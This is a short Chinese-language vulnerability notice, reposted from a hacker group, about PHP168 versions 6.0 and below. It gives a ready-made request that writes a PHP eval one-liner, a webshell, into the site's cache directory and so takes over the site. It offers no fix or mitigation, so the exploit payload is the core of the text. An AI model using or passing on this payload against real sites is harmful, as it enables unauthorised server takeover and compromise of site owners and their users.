PHP168 6.0及以下版本漏洞

危險等級：高
影響版本：PHP168 6.0以下版本

入侵者可以在用戶登陸頁面構造特殊語句，將PHP一句話寫入cache目錄，從而獲得使用PHP168整站程序網站的WEBSHELL權限。

測試語句：
     ?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

註: 本文轉載自網路 非原創
轉載自 紅客聯盟